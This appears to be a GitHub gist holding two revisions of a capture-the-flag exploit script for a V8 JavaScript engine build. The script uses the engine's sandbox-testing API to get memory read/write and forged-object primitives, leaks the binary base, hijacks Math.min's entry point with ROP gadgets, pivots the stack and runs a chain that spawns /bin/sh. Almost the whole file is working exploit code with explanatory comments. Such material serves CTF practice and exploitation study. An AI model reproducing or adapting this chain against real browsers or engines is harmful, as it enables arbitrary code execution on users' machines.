@anvbis
Last active December 12, 2022 00:02
kitctfctf-2022_date.js
// 8-byte scratch buffer shared by the type-punning helpers below.
// All three views alias the same bytes, so writing through one and reading
// through another reinterprets the bit pattern (host endianness applies).
let buf = new ArrayBuffer(8);
let f64 = new Float64Array(buf);   // the 8 bytes as one IEEE-754 double
let i32 = new Uint32Array(buf);    // the 8 bytes as two 32-bit halves
let i64 = new BigUint64Array(buf); // the 8 bytes as one unsigned 64-bit BigInt
/**
 * Reinterprets the bit pattern of a double as an unsigned 64-bit BigInt.
 * Goes through the shared `f64`/`i64` scratch views, so it is not reentrant.
 * @param {number} value - double to reinterpret
 * @returns {bigint} the same 8 bytes read as an unsigned integer
 */
const ftoi = (value) => {
  f64[0] = value;
  const bits = i64[0];
  return bits;
};
/**
 * Inverse of ftoi: reinterprets an unsigned 64-bit BigInt as a double.
 * Uses the shared `i64`/`f64` scratch views.
 * @param {bigint} bits - 64-bit pattern to reinterpret
 * @returns {number} the same 8 bytes read as a double
 */
const itof = (bits) => {
  i64[0] = bits;
  const asDouble = f64[0];
  return asDouble;
};
/**
 * Zero-extends a 32-bit unsigned value into a BigInt.
 * Clears the whole scratch word first, then stores the 32-bit value through
 * `i32[0]`; on a little-endian host that is the low half of `i64[0]`.
 * @param {number} low - value coerced to uint32 by the typed-array store
 * @returns {bigint} the 64-bit word with `low` in the low half and zero above it
 */
const i32toi64 = (low) => {
  i64[0] = 0n;   // make sure the high half is zero before the partial write
  i32[0] = low;
  return i64[0];
};
const addrof = o => Sandbox.getAddressOf(o);
/**
 * Reads a little-endian uint32 at address `p`.
 * Maps 64 bytes starting at `p` through the sandbox-testing MemoryView and
 * decodes the first four of them.
 * @param {number} p - address to read from
 * @returns {number} the uint32 stored at `p`
 */
const read32 = (p) => {
  const region = new Sandbox.MemoryView(p, 64);
  return new DataView(region).getUint32(0, true);
};
/**
 * Reads a little-endian uint64 at address `p` as a BigInt.
 * Same MemoryView mapping as read32, but decodes eight bytes.
 * @param {number} p - address to read from
 * @returns {bigint} the uint64 stored at `p`
 */
const read64 = (p) => {
  const region = new Sandbox.MemoryView(p, 64);
  return new DataView(region).getBigUint64(0, true);
};
/**
 * Writes `x` as a little-endian uint64 at address `p`.
 * @param {number} p - address to write to
 * @param {bigint} x - value to store
 * @returns {undefined} the result of DataView#setBigUint64
 */
const write64 = (p, x) => {
  const region = new Sandbox.MemoryView(p, 64);
  return new DataView(region).setBigUint64(0, x, true);
};
// --- Proof-of-concept chain, first variant ----------------------------------
// Every constant below (the 0x1898380 entry-point-to-ELF-base delta, the 0x2140
// heap delta, the gadget addresses, and the layout offsets 0x18 / 0xc / 0x7a /
// 0x3909) is specific to the challenge's V8 build; against any other binary they
// do not line up.
// NOTE(review): `Sandbox.getAddressOf` / `Sandbox.MemoryView` exist only in V8
// builds with the sandbox memory-corruption testing API enabled.
let code = read32(addrof(Math.min) + 0x18);        // per the author's naming: compressed pointer to Math.min's Code object
let entry_point = read64(code - 1 + 0xc);          // -1 strips V8's heap-object tag; +0xc is the entry-point field in this build
let elf = entry_point - 0x1898380n;                // binary load address, recovered from the builtin's entry point
let heap = read64(0x18) - 0x2140n                   // NOTE(review): no ';' — relies on ASI before the next statement
/* 0x0180d9ea: pop rdx; jmp qword ptr [rsi+0x41]; */
write64(code - 1 + 0xc, elf + 0x0180d9ean);         // hijack the builtin's entry point with the first gadget
/* 0x017bb33a: pop rsp; add rsp, 0x10; pop rbp; ret; */
write64(addrof(this) + 0x7a, elf + 0x017bb33an);    // stack-pivot gadget; `this` is the global object in a classic script
let binsh = heap + i32toi64(addrof("/bin/sh") + 0xc); // full 64-bit address of the string bytes: heap base + compressed offset
let chain = [                                        // sets rdi/rsi/rdx/rax then issues the syscall (rax = 59)
elf + 0x01b1f86bn, binsh, /* 0x01b1f86b: pop rdi; ret; */
elf + 0x019cece6n, 0n, /* 0x019cece6: pop rsi; ret; */
elf + 0x01aacb42n, 0n, /* 0x01aacb42: pop rdx; ret; */
elf + 0x019fc265n, 59n, /* 0x019fc265: pop rax; ret; */
elf + 0x01abf80bn /* 0x01abf80b: syscall; */
];
let ptr = addrof(this) + 0x3909;                    // presumably where the pivot's new rsp lands — build-specific
for (let i = 0; i < chain.length; i++)
write64(ptr + i*8, chain[i]);                        // lay the chain out as consecutive 8-byte words
Math.min();                                          // trigger: runs the hijacked entry point instead of the builtin
// Second variant of the same script (the page appears to show two revisions).
// It redeclares the same scratch buffer and helpers; since `let` redeclaration
// is a SyntaxError, the two listings must be separate files, not one program.
let buf = new ArrayBuffer(8);
let f64 = new Float64Array(buf);   // 8 bytes as one double
let i32 = new Uint32Array(buf);    // 8 bytes as two uint32 halves
let i64 = new BigUint64Array(buf); // 8 bytes as one unsigned 64-bit BigInt
/**
 * Double -> unsigned 64-bit BigInt, bit-for-bit, via the shared scratch views.
 * @param {number} d
 * @returns {bigint}
 */
const ftoi = function (d) {
  f64[0] = d;
  return i64[0];
};
/**
 * Unsigned 64-bit BigInt -> double, bit-for-bit, via the shared scratch views.
 * @param {bigint} q
 * @returns {number}
 */
const itof = function (q) {
  i64[0] = q;
  return f64[0];
};
/**
 * Zero-extends a uint32 into a BigInt (low half on little-endian hosts).
 * The scratch word is cleared first so stale high bytes cannot leak through.
 * @param {number} word32
 * @returns {bigint}
 */
const i32toi64 = function (word32) {
  i64[0] = 0n;
  i32[0] = word32;
  const widened = i64[0];
  return widened;
};
const addrof = o => Sandbox.getAddressOf(o);
// Exploit primitive with build-specific offsets: returns a JS reference whose
// compressed pointer is `p`. As written: `obj` is a one-element array; the
// uint32 at +8 of the array is read as the tagged compressed pointer of its
// element store, -1 untags it and +8 presumably skips the store's header to the
// slot holding element 0; that slot is overwritten with `p + 1` (re-tagged as a
// heap object) and obj[0] returns the forged reference.
const fakeobj = p => {
let obj = [{}];
let buf = new Sandbox.MemoryView(addrof(obj), 64);
let view = new DataView(buf);
let ptr = view.getUint32(8, true) - 1 + 8;   // NOTE(review): +8 assumed to be the first element slot — confirm against this build's layout
buf = new Sandbox.MemoryView(ptr, 64);
view = new DataView(buf);
view.setUint32(0, p + 1, true);
return obj[0];
};
/**
 * Little-endian uint32 read at address `p` through a 64-byte MemoryView.
 * @param {number} p
 * @returns {number}
 */
const read32 = function (p) {
  const dv = new DataView(new Sandbox.MemoryView(p, 64));
  const value = dv.getUint32(0, true);
  return value;
};
/**
 * Little-endian uint64 read at address `p` through a 64-byte MemoryView.
 * @param {number} p
 * @returns {bigint}
 */
const read64 = function (p) {
  const dv = new DataView(new Sandbox.MemoryView(p, 64));
  const value = dv.getBigUint64(0, true);
  return value;
};
/**
 * Little-endian uint64 write of `x` at address `p` through a 64-byte MemoryView.
 * @param {number} p
 * @param {bigint} x
 * @returns {undefined} result of DataView#setBigUint64
 */
const write64 = function (p, x) {
  const dv = new DataView(new Sandbox.MemoryView(p, 64));
  return dv.setBigUint64(0, x, true);
};
// --- Proof-of-concept chain, second variant ---------------------------------
// Same build-specific constants as the first variant (0x1898380, 0x2140, the
// gadget addresses, and the layout offsets); none of them transfer to another
// binary. The difference is the pivot: the chain lives in a Float64 array and is
// reached via a forged object passed as the argument, instead of being written
// next to the global object.
// NOTE(review): `Sandbox.*` is the V8 sandbox-testing API and is absent from
// release builds.
let code = read32(addrof(Math.min) + 0x18);        // per the author's naming: compressed pointer to Math.min's Code object
let entry_point = read64(code - 1 + 0xc);          // -1 strips the heap-object tag; +0xc is the entry-point field in this build
let elf = entry_point - 0x1898380n;                // binary load address
let heap = read64(0x18) - 0x2140n                   // NOTE(review): no ';' — relies on ASI before the next statement
/* 0x01b16b01: pop r15; pop rbp; jmp qword ptr [rsi+0x18]; */
write64(code - 1 + 0xc, elf + 0x01b16b01n);         // first gadget replaces the builtin's entry point (gadget comments were swapped; now each sits above its own write)
/* 0x019842c5: pop rsp; ret; */
write64(addrof(this) + 0x39 + 0x18, elf + 0x019842c5n); // stack-pivot gadget, presumably at the [rsi+0x18] slot the first gadget dispatches through
let binsh = heap + i32toi64(addrof("/bin/sh") + 0xc); // full 64-bit address of the string bytes
let stack = [                                        // stored as raw doubles (itof) so the array's element store holds the chain words verbatim
itof(elf + 0x01b1f86bn), itof(binsh), /* 0x01b1f86b: pop rdi; ret; */
itof(elf + 0x019cece6n), itof(0n), /* 0x019cece6: pop rsi; ret; */
itof(elf + 0x01aacb42n), itof(0n), /* 0x01aacb42: pop rdx; ret; */
itof(elf + 0x019fc265n), itof(59n), /* 0x019fc265: pop rax; ret; */
itof(elf + 0x01abf80bn) /* 0x01abf80b: syscall; */
];
let o = fakeobj(addrof(stack) + 0x33);              // forged reference presumably pointing into `stack`'s element store (0x33 is build-specific)
Math.min(o);                                         // trigger: the hijacked entry point runs with the forged object as argument